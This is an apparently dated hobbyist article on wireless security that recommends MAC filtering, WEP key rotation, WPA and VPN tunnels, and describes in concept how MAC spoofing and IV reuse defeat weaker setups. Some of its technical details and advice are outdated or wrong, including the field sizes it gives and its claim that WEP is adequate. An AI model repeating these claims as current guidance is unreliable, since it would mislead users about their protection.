Wireless
Networking for the Paranoid Hacker
Wireless Networking for the Paranoid Hacker
by: luminaire
Implementing Basic
Wireless Security
We've all done it; we've all seen the insecurity that
wireless networking has brought our world. It's a new frontier, and there are
open doors where ever we turn. Fewer among us are those who have actually sat
down and broken an 802.11b WEP key. Although it is time consuming it can be
done, especially when it comes to business networks administered by wanna-be
network administrators. Point being is that we know the keys can be broken.
Where does leave those of us who want to enjoy the freedom of wireless? Whether
it is in our own networks, or in public access nodes, we are concerned both
with data security and privacy. Here I will cover a few methods of securing a
wireless network, as well as securing your connection over a public wireless
network.
Key
Differences
One slight detail to keep in mind
whilst reading this article: My suggestions on home wireless cover mainly
security and ways of keeping people off of your network to begin with. If you
want to open your network to all those in range you can take the majority of
tips from the public wireless network section and apply them.
Home Wireless Security
-Simple
Methods
ACL
ACL or an access control list is feature that I have
found in almost every wireless router I have come across. In my opinion it is
an indispensable security tool. I can already hear the objections of those who
have either defeated these systems or know how to, at least in theory. ACL's
filter based on a listed of wireless card MAC addresses. They examine the MAC
address of any card that attempts to join the network, and if that MAC is not
found on a list of approved MAC addresses the card is not permitted to join the
network. Of course this can be defeated by an attack her sniffs an approved MAC
address out of the air, uses a MAC spoofer to make their MAC your own, and then
join the network. Once you're in its easy enough to knock the real user off the
network, however strictly speaking you don't have to in order for you to use
the network. My suggestion, for a home network would be to only authorize your
own cards, and the cards of users who are permitted to join the network. This
is not a sure way to keep unauthorized users out, however when coupled with
other security methods it can be effective.
WEP
WEP, or wired equivalent privacy, is the determined
hacker's best friend. WEP can be broken in less than eight hours. Most of you
will read this and conclude that it is a weak encryption and unfit to secure
data, however there are two points to keep in mind when considering WEP.
Firstly, network traffic must be at a peak for the attacker to capture enough
packets to break WEP, and secondly it takes up to 8 hours of sniffing to
capture the packets. For my own personal network the first point is negated
because I have a cron job which transfers files to a wireless client in
gigantic dumps nightly, however it still requires a dedicated attacker to break
WEP. A determined attacker can be slowed by rotating WEP keys weekly, or for
the paranoid, daily, however if you are so paranoid, why are you using WEP? Key
rotation can only take you so far.
WPA
Many new 802.11g access points allow
for use of WPA (wifi protected access). WPA uses a pre-shared key in order to
encrypt wireless transmissions. There are currently no tools for cracking WPA;
however WPA is vulnerable to a dictionary attack meaning that a determined
attacker can simply try every combination of words, and common phrases until
he/she breaks your key. As you can guess this is much more time consuming than
automated cracking of WEP keys. WPA is significantly more secure, and if you
have the cash, and are buying a dedicated wireless router, I would choose an
802.11g router simply for the added strength of encryption.
How WPA Works
What makes WEP weak is its initialization vector (IV).
The IV is a 24 bit number that is combined with the key that the network
administrator (you) entered into your access point's configuration interface. A
new IV is used for each frame (packet) transmitted. There are two problems with
this. First of all the IV is a pseudo random number, which is not truly random,
and thus can be predicted within a range. Secondly, and more problematic, is
that fact that the IV will recycle itself over a certain amount of time, which
means you have the same IV and same key with a different payload. If an
intruder collects enough of these frames (packets) that person is able to
compromise your network. WPA has been improved by using a 48 bit IV, which
means it will be significantly longer before the IV is recycled. The second way
that WPA improves over WEP is the way that users connect to a WPA enabled AP.
When a user connects they are authenticated using a pre-shared key, or in more
advanced configurations a password from an authentication server (LDAP, RADIUS,
etc). Once they are made a member of this network a WPA key is created. Periodically
WPA will generate a new key per client, which when combined with the longer IV
makes WPA much harder to crack. Finally WPA uses has strengthened a technology
used in WEP verification. Upon transmission of every frame WEP added a 4 bit
ICV (integrity check code) to verify that data integrity (i.e. no injected
packets, no forgeries). The problem with this is apparent. An intruder can
intercept the transmission, modify the payload, recalculate the ICV, and then
retransmit, and none will be the wiser. However, WPA solves this problem with a
new 8 bit MIC (message integrity code), that resides within the encrypted
payload, and factors into the calculation of the ICV, which reduces the
possibility of forged packets. These improvements over WEP make WPA a sound
security method for any network, until that is they release 802.11i, but that's
a topic for another day.
Summary for Home Users
For the average user using an ACL combined with either
WEP (with key rotation), or hopefully WPA, will provide adequate security, at
least for preventing unauthorized users from accessing the network. If you are
looking to share your network but want to ensure that your data remains private
please look at the data security section in the next section.
Data Security
-VPN's
Any form of massive connection sharing, over a public
network whether it is wired or wireless can be sniffed. Along with the threat
of interception comes with the added risk of data injection. If an attacker can
capture your private information he/she can then inject packets, and forge
communications to interfere with your communication. In many other security
articles VPN's have been listed as a way for users to ensure the reliability
and authenticity of data flow, however it has been listed as either a last resort
or a unsavory method. Anyone who has ever intercepted "secure"
communication over a network knows that VPN's are an invaluable tool for
keeping your private information private. There are several methods of doing
this.
About VPN's
VPN's as they pertain to this article allow for the user
to create a secure channel of communication between two points, whether they
are two nodes on a network, or two routers, or creating a link between
networks. They do so by using IPSec, which is a part of IPv6 that has been back
ported for IPv4. VPN's encrypt traffic, and then encapsulate the original
encrypted packet, in a normal IP packet, and then send to the other end of the
tunnel. Upon receiving thing encrypted packet, the packet is decapsulated, and
decrypted. VPN assure a user that their path to a remote system is both
encrypted and secure, even through it traverses through an insecure network.
Wireless VPN Routers
Wireless VPN routers are a good one box solution to the
wireless security problem. Upon joining a wireless network, whether it is
public or encrypted, clients can form a secure connection with the wireless
router via VPN tunnel. Hence forth all data is encrypted. This is the easiest
solution, however the most expensive.
VPN Routers on a Wired
Segment
Wired VPN routers are a two box solution, which are
slightly cheaper than buying a one box wireless VPN router. Same actual
solution, you are establishing a VPN tunnel with a router on the network.
Clients access the network using a wireless access point. Upon joining the
wireless network the client forms a VPN tunnel with the wired VPN router,
securing all connections through that tunnel.
VPN Wireless Solutions
(Reef Edge)
There are several free offerings, such as Reef Edge.
Although I have not personally experimented with Reef Edge, it seems to be a
promising VPN wireless router solution. On that note, many other products
exist; free bootable Linux Router OS's that'll do the job. This is the cheapest
way, however the one that requires the most experience.
